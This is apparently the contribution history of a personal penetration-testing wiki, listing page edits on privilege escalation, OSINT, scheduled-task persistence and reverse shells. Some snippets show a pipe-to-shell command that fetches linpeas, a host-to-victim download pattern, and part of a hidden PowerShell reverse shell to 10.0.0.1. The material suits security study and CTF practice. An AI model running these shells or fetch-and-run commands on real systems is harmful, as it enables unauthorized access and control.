21 February 2023
- 10:0410:04, 21 February 2023 diff hist +33 N Privilege Escalation Check List - Linux Created page with "Category:Privilege Escalation" Tag: Visual edit: Switched
- 10:0210:02, 21 February 2023 diff hist +77 Scheduled Task No edit summary current Tag: Visual edit
- 09:5909:59, 21 February 2023 diff hist +908 Scheduled Task No edit summary
- 09:4909:49, 21 February 2023 diff hist +308 PEAS No edit summary current Tag: Visual edit
- 09:4709:47, 21 February 2023 diff hist +174 PEAS No edit summary
- 09:4509:45, 21 February 2023 diff hist +3,179 N PEAS Created page with "Category:Tools Category:Reconnaissance ==Latest Releases== <syntaxhighlight lang=powershell> https://github.com/carlospolop/PEASS-ng/releases/tag/20230219 </syntaxhighlight> ==Quick Start LinPeas== <syntaxhighlight lang=powershell> # From github curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh # Local network sudo python -m http.server 80 #Host curl 10.10.10.10/linpeas.sh | sh #Victim # Without curl sudo nc -q 5 -lvnp 8..."
5 February 2023
- 16:0016:00, 5 February 2023 diff hist +4 Subnetting No edit summary current
- 15:5815:58, 5 February 2023 diff hist +96 Subnetting No edit summary Tag: Visual edit
- 15:5615:56, 5 February 2023 diff hist +10 N File:Subnet3.png No edit summary current
- 15:5515:55, 5 February 2023 diff hist +10 N File:Subnet2.png No edit summary current
- 15:5315:53, 5 February 2023 diff hist +49 N Subnetting Created page with "center|frameless|1000x1000px" Tag: Visual edit
- 15:5215:52, 5 February 2023 diff hist +10 N File:Subnet1.png No edit summary current
- 15:4715:47, 5 February 2023 diff hist +487 N Nishang Created page with "Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing. By Nikhil Mittal Founder of Altered Security - Hands-on red team and enterprise security training!<ref>https://github.com/samratashok/nishang</ref><syntaxhighlight lang="powershell"> ## Git Repo https://github.com/samratashok/nishang </syntaxhighlight> <r..." current Tag: Visual edit
- 15:4115:41, 5 February 2023 diff hist +406 Powershell Reverse Shells No edit summary Tag: Visual edit
- 15:3215:32, 5 February 2023 diff hist +698 N OSINT Created page with "Category:Reconnaissance ==Useful Links== <syntaxhighlight lang=powershell> ## Links https://osintcurio.us https://www.osint.games https://osintframework.com http://hunter.io http://pimeyes.com http://phonebook.cz http://email-checker.net http://emailhippo.com ## Plugins clearbit - company lnfo lookup # Chrome Extension ## Data Breaches https://dehashed.com https://alternativeto.net/tag/data-breach https://haveibeenpwned.com https://whatsmyname.app https://kik.m..." current Tag: Visual edit: Switched
1 February 2023
- 17:3817:38, 1 February 2023 diff hist +46 DS Store No edit summary current
- 17:3617:36, 1 February 2023 diff hist +600 N DS Store Created page with "Category:Reconnaissance ==About .ds_stores== .DS_Store files contain records of the different properties (fields) of the files or directories of the directory of .DS_Store. These fields can specify things like modification dates, icons, backgrounds, comments, etc. This program parses, displays, and explains all the fields currently known in .DS_Store. (There's a lot!) <syntaxhighlight> sudo git clone https://github.com/HanwenZhu/.DS_Store-parser cd .DS_Store-parser..."
- 16:4516:45, 1 February 2023 diff hist +2 Ffuf No edit summary current
- 16:4416:44, 1 February 2023 diff hist +25 Ffuf No edit summary
28 January 2023
- 13:2713:27, 28 January 2023 diff hist 0 N Category:Collection Created blank page
- 13:2613:26, 28 January 2023 diff hist −1 ALi3nW3rX Rev Shell Cheat Sheet No edit summary current
- 13:2513:25, 28 January 2023 diff hist −108 Powershell Reverse Shells No edit summary
- 13:2413:24, 28 January 2023 diff hist +14 ALi3nW3rX Rev Shell Cheat Sheet No edit summary
- 13:2313:23, 28 January 2023 diff hist +46 ALi3nW3rX Rev Shell Cheat Sheet No edit summary
- 13:2113:21, 28 January 2023 diff hist +25 N ALi3nW3rX Rev Shell Cheat Sheet Created page with "category:Cheat Sheets"
- 13:1813:18, 28 January 2023 diff hist +25 N Category:Cheat Sheets Created page with "Drop you cheat sheet here"
- 13:1713:17, 28 January 2023 diff hist +160 Powershell Reverse Shells No edit summary
- 13:1413:14, 28 January 2023 diff hist +1,664 N Powershell Reverse Shells Created page with "==Powershell Reverse Shells<ref>https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#powershell</ref>== <syntaxhighlight lang="powershell"> powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName..."
- 13:1313:13, 28 January 2023 diff hist +27 N Category:Reverse Shells Created page with "category:Initial Access" current
- 13:0813:08, 28 January 2023 diff hist 0 N Category:Impact Created blank page Tag: Visual edit
- 12:0312:03, 28 January 2023 diff hist +5 Ping No edit summary Tag: Visual edit: Switched
- 12:0012:00, 28 January 2023 diff hist +1,315 N Ping Created page with "Category:Active Scanning ==Description== Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Adversaries may scan IP blocks in order to Gather Victim Network Information, such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings..."
- 11:3911:39, 28 January 2023 diff hist 0 User:Ali3nw3rx No edit summary current
- 11:3811:38, 28 January 2023 diff hist +74 User:Ali3nw3rx No edit summary Tag: Visual edit
- 11:3311:33, 28 January 2023 diff hist +24 N User:Ali3nw3rx Created page with "thumb"
- 11:3111:31, 28 January 2023 diff hist +9 N File:Gaming-logo-maker-featuring-robotic-animal-graphics-1028-el1 (3).png No edit summary current
26 January 2023
- 18:4718:47, 26 January 2023 diff hist +171 N Template:Test page Created page with "== This is our test page == == section 1 == === code we want to grab === == section 2 == === more code to grab === <syntaxhighlight> some random code </syntaxhighlight>" current
- 18:2318:23, 26 January 2023 diff hist +29 N Test cheat sheet Created page with "enumeration"
- 17:5217:52, 26 January 2023 diff hist +27 Category:Scheduled Task/Job No edit summary current
- 16:2016:20, 26 January 2023 diff hist +435 N Category:Persistence Created page with "The adversary is trying to maintain their foothold. Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code."
- 16:1416:14, 26 January 2023 diff hist 0 m Category:Execution Protected "Category:Execution" ([Edit=Allow only administrators] (indefinite) [Move=Allow only administrators] (indefinite))
- 16:0516:05, 26 January 2023 diff hist +775 N Container Orchestration Job Created page with "Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster...." current
- 16:0516:05, 26 January 2023 diff hist +1,173 N Systemd Timers Created page with "Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to Cron in Linux environments.[1] Systemd timers may be activated remotely via the systemctl command line utility, which operates over SSH.[2] Ea..." current
- 16:0416:04, 26 January 2023 diff hist +1,769 N Scheduled Task Created page with "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, ad..."
- 16:0316:03, 26 January 2023 diff hist +546 N Cron Created page with "Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.[1] The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths. An adversary may use cron in Linux or Unix environments to execute programs at system startup or..." current
- 16:0316:03, 26 January 2023 diff hist +1,444 N At Created page with "Adversaries may abuse the at utility to perform task scheduling for initial or recurring execution of malicious code. The at utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of Scheduled Task's schtasks in Windows environments, using at requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. On Linux and..." current
- 16:0216:02, 26 January 2023 diff hist +987 N Category:Scheduled Task/Job Created page with "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of..."
- 15:1615:16, 26 January 2023 diff hist +437 N Category:Execution Created page with "The adversary is trying to run malicious code. Execution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery."
22 January 2023
- 14:5614:56, 22 January 2023 diff hist +538 Template:Writeup No edit summary current
- 14:4714:47, 22 January 2023 diff hist +311 N Template:Writeup Created page with "==Box Info== <syntaxhighlight> * Box Name * Box IP * Date </syntaxhighlight> ==Enumeration== ===Credentials=== <syntaxhighlight> * Usernames * Passwords * Hashes * Notes </syntaxhighlight> ===NMAP=== ===LINWINPWN=== ===DIR SEARCH=== ==Exploits== ==Foot Hold== ==Privilege Escalation== ==Pivot/Lateral Movement=="